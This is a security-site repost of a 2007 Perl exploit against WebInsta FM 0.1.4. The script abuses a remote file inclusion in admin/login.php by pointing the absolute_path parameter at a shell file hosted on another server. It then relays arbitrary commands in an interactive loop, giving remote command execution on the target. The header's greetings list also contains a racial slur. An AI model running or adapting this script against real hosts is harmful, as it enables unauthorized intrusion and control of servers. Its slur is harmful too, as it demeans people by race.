首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WEBInsta FM 0.1.4 login.php absolute_path Remote File Inclusion Exploit
来源:www.g00ns.net 作者:TrinTiTTy 发布时间:2007-04-24  
#!/usr/bin/perl
##############################################################################################
#         ___   ___                         _
#        / _ \ / _ \                       | |
#   __ _| | | | | | |_ __  ___   _ __   ___| |_
#  / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
# | (_| | |_| | |_| | | | \__ \_| | | |  __/ |_
#  \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
#   __/ |
#  |___/
##############################################################################################
#INFO:
#Program Title ###############################################################################
#WebInsta FM <= 0.1.4 Remote File Inclusion Vulnerability
#
#Description #################################################################################
#This is a basic file manager written by WebInsta.com
#
#Vuln Code ###################################################################################
#In /admin/login.php:
#   if(isset($_COOKIE['adminname']) && isset($_COOKIE['adminpass'])){
#      $cusername = $_COOKIE['adminname'];
#      $cpassword = $_COOKIE['adminpass'];
#   include($absolute_path."admin/checkpass.php");
#   }
#Note: Register globals must be ON, and Magic Quotes must be OFF for this exploit to work.
#
#Script Download ##############################################################################
#http://webinsta.com/cgi-bin/axs/ax.pl?http://www.webinsta.com/downloads/webinstafm.zip
#
#Original Advisory ############################################################################
#http://g00ns-forum.net/showthread.php?t=8643
#
#Exploit #######################################################################################
#                             
#[c]ode by TrinTiTTY (2007) www.g00ns.net
#credz to MurderSkillz and FiSh for vulnerability
#shoutz: clorox, z3r0, katalyst, SyNiCaL, Nigger, OD, pr0be, 0ptix, rezen [at] rezen.org, str0ke
#        grumpy, and everyone else at g00ns.net
###############################################################################################
use IO::Socket;

$host = @ARGV[0];
$path = @ARGV[1];
$shell = @ARGV[2];

if (@ARGV != 3){header();usage();exit();}
header();
print "\n [!] Type 'quit' to exit\n";
xpl();
sub xpl(){
while (){
print "\nshell\@box\$ ";
$command = <STDIN>;
chomp($command);
if ($command =~ /quit/i){exit();}

$sock = IO::Socket::INET->new(PeerAddr => "$host",PeerPort => "80",Proto => "tcp") || die "Can't establish a connection\n";
print $sock "GET $path/admin/login.php?absolute_path=$shell?&cmd=$command HTTP/1.1\n";
print $sock "Host: ".$host."\n";
print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6\n";
print $sock "Accept: */*\n";
print $sock "Accept-Language: en-us,en;q=0.5\n";
print $sock "Accept -Encoding: gzip , deflate\n";
print $sock "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n";
print $sock "Keep-Alive: 300\n";
print $sock "Connection: keep-alive\n";
print $sock "Referer: $host\n";
print $sock "Cookie: adminname=c84ejd9;adminpass=s3lm5;PHPSESSID=032b155cf082c0f28009ec65ee7986f1\n\n";
while ($ans = <$sock>){
if ($ans =~ /<b>Warning<\/b>:(.*?)/gmi)
{print "\n [-] Bad site, command, or shell\n";xpl()}
if ($ans =~ /<html>(.*)/i){xpl()}
print $ans;
}}}
sub header(){
print q{
|======================================================|
|                  WebInsta FM (RFI)                   |
|         [c]oded by TrinTiTTy [at] g00ns.net          |
| -----------------------------------------------------|
|                                                      |
|        Vulnerability by MurderSkillz and FiSh        |
|             greetz: 13337.org, rezen.org str0ke      |
|                                                      |
|                   www.g00ns.net                      |
|======================================================|
}}
sub usage()
{
print "\n Usage: perl $0 <host> <dir> <shell>";
print "\n Example: perl $0 www.victim.com /pathtofm http://www.othersite.com/shell.txt\n\n";
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·XnView 1.90.3 (.XPM File) Loca
·Corel Paint Shop Pro Photo 11.
·ACDSee 9.0 (.XPM File) Local B
·MyBulletinBoard (MyBB) <= 1.2.
·Photofiltre Studio v8.1.1 (.TI
·Winamp <= 5.33 (.AVI File) Rem
·Foxit Reader 2.0 (PDF) Remote
·Opera 9.2 (torrent File) Remot
·eXtremail <= 2.1.1 DNS Parsing
·GNU Mailutils imap4d 0.6 Remot
·Gimp 2.2.14 .RAS File SUNRAS P
·Winamp <= 5.3 (WMV File) Remot
  推荐广告
CopyRight © 2002-2025 VFocuS.Net All Rights Reserved